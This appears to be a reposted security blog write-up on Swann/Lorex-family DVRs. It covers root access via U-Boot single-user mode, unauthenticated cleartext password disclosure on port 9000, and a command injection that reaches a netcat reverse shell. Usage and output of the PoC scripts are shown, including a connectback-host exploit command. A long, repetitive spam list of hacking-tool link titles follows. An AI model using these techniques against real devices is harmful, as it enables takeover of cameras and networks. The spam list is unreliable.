Sunday, August 23, 2020

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single



This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".


Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:


"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.
Related articles

  1. New Hack Tools
  2. Usb Pentest Tools
  3. Pentest Tools Alternative
  4. Hacking Tools For Pc
  5. Pentest Tools Website Vulnerability
  6. Pentest Tools Bluekeep
  7. Hackrf Tools
  8. Easy Hack Tools
  9. Pentest Tools Tcp Port Scanner
  10. Hacking Tools Mac
  11. Hacking App
  12. Wifi Hacker Tools For Windows
  13. Hacking Tools Usb
  14. Hack Tools For Games
  15. Underground Hacker Sites
  16. Hacking Tools For Windows Free Download
  17. Hacking Tools Pc
  18. Hacker Tools Online
  19. Pentest Tools For Windows
  20. Usb Pentest Tools
  21. Hacker Tools For Windows
  22. Hacker Tools Online
  23. Pentest Tools Tcp Port Scanner
  24. Pentest Tools List
  25. New Hacker Tools
  26. Hack Tools For Games
  27. Pentest Tools Framework
  28. Pentest Reporting Tools
  29. Pentest Tools Tcp Port Scanner
  30. Pentest Tools Download
  31. Pentest Tools Alternative
  32. Hacker Tools For Windows
  33. Pentest Tools Github
  34. Tools 4 Hack
  35. Pentest Tools Website
  36. Pentest Tools Port Scanner
  37. Hacker Tools Apk
  38. Hacks And Tools
  39. Hacking Tools Hardware
  40. Hack Tools 2019
  41. Computer Hacker
  42. Hacking Tools Free Download
  43. Hack Tools Pc
  44. Hack Tools Github
  45. Pentest Tools Review
  46. Hack Tools For Mac
  47. Hack Tools For Games
  48. Pentest Tools Open Source
  49. Hacker Tools Apk
  50. Hak5 Tools
  51. Hack Tools Pc
  52. Pentest Tools Github
  53. Hacker
  54. Hacking Tools Github
  55. Hacking Tools For Pc
  56. Hacker Tools Apk Download
  57. Hacking Tools Usb
  58. Hacker Tools Apk Download
  59. Hack Tools Download
  60. Hacker Tools For Mac
  61. Hacking Tools Github
  62. Hacker Tools Online
  63. Pentest Tools For Android
  64. Pentest Tools Framework
  65. Hack Tools For Games
  66. Pentest Tools Subdomain
  67. Hacker Tools Apk Download
  68. Pentest Tools Linux
  69. Pentest Tools Bluekeep
  70. Top Pentest Tools
  71. Hacking Tools Usb
  72. What Are Hacking Tools
  73. Hack Tools Mac
  74. Hack Tools For Games
  75. Hacker
  76. Pentest Automation Tools
  77. Hacking Tools And Software
  78. Hack Tools For Games
  79. Hacker Search Tools
  80. Hack Tools Mac
  81. Pentest Tools Download
  82. Easy Hack Tools
  83. Pentest Tools Review
  84. Hackrf Tools
  85. Top Pentest Tools
  86. Hacking Tools 2019
  87. Pentest Tools Kali Linux
  88. Hack Rom Tools
  89. Kik Hack Tools
  90. Pentest Tools Download
  91. Github Hacking Tools
  92. Best Hacking Tools 2020
  93. Pentest Tools Tcp Port Scanner
  94. Growth Hacker Tools
  95. Hacker Tools Windows
  96. Best Pentesting Tools 2018
  97. Hacking Tools
  98. Hacker Tools Windows
  99. Nsa Hacker Tools
  100. Hacker Tools Github
  101. Hacking Tools 2019
  102. Pentest Tools Free
  103. Hack Tool Apk
  104. Physical Pentest Tools
  105. Hacking Tools For Windows 7
  106. Pentest Tools For Windows
  107. Hacker Tools For Mac
  108. Hacker Tools For Mac
  109. Hacker Techniques Tools And Incident Handling
  110. Pentest Tools Free
  111. How To Hack
  112. Hacker Tools For Mac
  113. Hacker Tool Kit
  114. Hacking Tools Download
  115. Pentest Tools Framework
  116. Pentest Tools List
  117. Pentest Tools Open Source
  118. Top Pentest Tools
  119. Growth Hacker Tools
  120. Bluetooth Hacking Tools Kali
  121. Hacker Tools Free Download
  122. Hack Tools For Windows
  123. Physical Pentest Tools
  124. Hack Tools Online
  125. Pentest Tools Subdomain
  126. Hack Tools Download
  127. Free Pentest Tools For Windows
  128. Hack Tools Github
  129. Best Hacking Tools 2020
  130. Hack Tool Apk
  131. Hacking Tools Download
  132. Hackrf Tools
  133. Hacking Tools For Games
  134. Hacker Tools For Ios
  135. Bluetooth Hacking Tools Kali
  136. Best Hacking Tools 2020
  137. Hacker Tools Apk Download
  138. Hacker Tools Free
  139. Hacker Techniques Tools And Incident Handling
  140. New Hacker Tools
  141. Pentest Tools Website
  142. World No 1 Hacker Software
  143. Hacking Tools 2019
  144. Pentest Tools Find Subdomains
  145. Hacking Tools Software
  146. Top Pentest Tools
  147. Hacker Techniques Tools And Incident Handling
  148. New Hack Tools
  149. Hacker Tools Hardware
  150. Install Pentest Tools Ubuntu
  151. Pentest Tools Alternative
  152. Best Hacking Tools 2020
  153. Pentest Tools Linux
  154. Kik Hack Tools
  155. Hacking Tools Mac
  156. Pentest Tools Linux
  157. Hackers Toolbox
  158. Free Pentest Tools For Windows
  159. Hacker Tools Software
  160. Hack Tools For Windows
  161. Best Hacking Tools 2020
  162. Pentest Tools Nmap
  163. Hack Tools For Games
  164. Hacker Tools List
  165. Hack Tools For Mac
  166. Pentest Tools Open Source
  167. New Hacker Tools
  168. Pentest Tools Open Source
  169. Hacking App
  170. Usb Pentest Tools
  171. Best Pentesting Tools 2018
  172. Android Hack Tools Github
  173. Pentest Tools For Mac

No comments: